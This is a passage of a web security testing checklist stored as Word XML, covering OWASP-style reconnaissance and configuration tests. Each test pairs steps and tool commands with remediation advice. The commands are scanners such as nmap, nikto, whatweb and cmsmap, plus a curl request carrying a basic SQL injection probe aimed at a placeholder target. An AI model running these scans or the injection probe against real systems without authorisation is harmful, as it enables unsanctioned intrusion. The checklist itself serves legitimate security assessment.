          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable source maps in production builds, or restrict their access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-006  —  Identify Application Entry Points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Suite Proxy, OWASP ZAP, Tamper Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate every point where the application accepts user input — hidden fields, parameters, HTTP headers, upload forms — as these are all potential attack surfaces for later test phases.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Proxy all browser traffic through Burp/ZAP while manually navigating the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the resulting site map for every GET/POST parameter, cookie, and custom header used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect HTML source for hidden form fields (type=hidden).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Record all discovered entry points in a spreadsheet for systematic later testing.</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(Burp) Proxy &gt; HTTP history — review all requests</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(ZAP) Spider + AJAX Spider to enumerate all reachable endpoints</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Apply consistent server-side input validation to every entry point, including hidden fields and headers — never trust client-side-only validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimize the use of hidden fields for anything security-relevant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-007  —  Map Execution Paths Through Application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Suite Proxy, OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand the application's principal workflows (registration, checkout, admin functions) to identify logic and multi-step vulnerabilities later.</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Manually walk through every primary business workflow while proxying traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagram the sequence of requests each workflow generates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify workflow steps that could be skipped, reordered, or repeated out of sequence.</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(Burp) Target &gt; Site map — review the full navigable tree</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">(Burp) Sequencer for correlating multi-step tokens</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Enforce server-side state/sequence validation for multi-step workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not rely on the UI alone to prevent step-skipping — validate that prerequisite steps were actually completed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-008  —  Fingerprint Web Application Framework</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WhatWeb, BlindElephant, Wappalyzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the CMS or web framework in use (WordPress, Django, Laravel, etc.) via headers, cookies, source code, and characteristic files/folders.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Run an automated fingerprinting tool against the target root URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually check for framework-specific cookies (e.g., PHPSESSID, csrftoken, laravel_session).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for framework-characteristic paths (/wp-content/, /administrator/, /sites/default/).</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whatweb -a 3 https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wappalyzer https://target.com  (browser extension / CLI)</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Remove framework version disclosures from headers, cookies, and error pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep the CMS/framework and its plugins patched and up to date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-009  —  Fingerprint Web Application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WhatWeb, BlindElephant, Wappalyzer, CMSmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify the specific web application and its version to correlate against known application-level CVEs.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Run CMSmap or an equivalent CMS-specific scanner if a CMS was identified in the prior step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Check changelog, README, or version files that are commonly left accessible (e.g., /CHANGELOG.txt, /readme.html).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-reference the confirmed version against public exploit databases.</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cmsmap -t https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl https://target.com/readme.html</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Remove publicly accessible changelog/readme/version files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply security patches promptly on a defined cadence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-INFO-010  —  Map Application Architecture</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Browser, curl, wget</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine the full technology stack supporting the application — language, WAF/reverse proxy, application server, and backend database — to inform test strategy.</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Inspect response headers and cookies across multiple requests for stack indicators (X-Powered-By, Set-Cookie names, error page formatting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Send a request likely to trigger a WAF signature (e.g., a basic XSS/SQLi payload) and observe if it is blocked, indicating a WAF/reverse proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger application errors deliberately (invalid input types) to observe stack traces revealing language/framework/DB engine.</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curl -I https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl "https://target.com/?id=1' OR '1'='1"  (observe WAF block page or error)</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Return generic error pages in production; never expose stack traces to end users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure a WAF is correctly tuned and does not itself leak configuration details in block pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration and Deploy Management Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This category verifies that the underlying infrastructure, application platform, and deployment process are securely configured — covering default installs, verbose error handling, unnecessary HTTP methods, transport security headers, and cross-domain policies that are frequently misconfigured in production.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-CONFIG-001 – OTG-CONFIG-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-001  —  Test Network/Infrastructure Configuration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Nessus, OpenVAS, Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand how infrastructure components (web/app/DB servers, WebDAV, FTP) interact and identify known vulnerabilities from misconfiguration or missing patches.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Run a full infrastructure vulnerability scan against all discovered hosts and ports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Review results for outdated software versions, default credentials, and unnecessary exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually validate scanner findings to eliminate false positives before reporting.</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nmap -sV -sC -p- target-ip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nessuscli scan --new  (or via Nessus web UI, launch a Basic Network Scan)</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Apply vendor security patches on a regular, defined cadence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable or firewall unnecessary services (FTP, WebDAV) not required for production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Segment infrastructure tiers (web/app/DB) with network-level access controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CONFIG-002  —  Test Application Platform Configuration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Browser, Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify default installation files/directories, verify error handling for 4xx/5xx codes does not leak information, confirm least-privilege service accounts, and check logging is enabled.</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Run Nikto against the target to enumerate default/insecure files and misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Manually request common default install paths (e.g., /phpinfo.php, /server-status, /admin-console).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger 404/500 errors and confirm no stack traces or internal paths are revealed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify the application/service account is not running with unnecessary elevated privileges (requires infrastructure access/interview).</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nikto -h https://target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
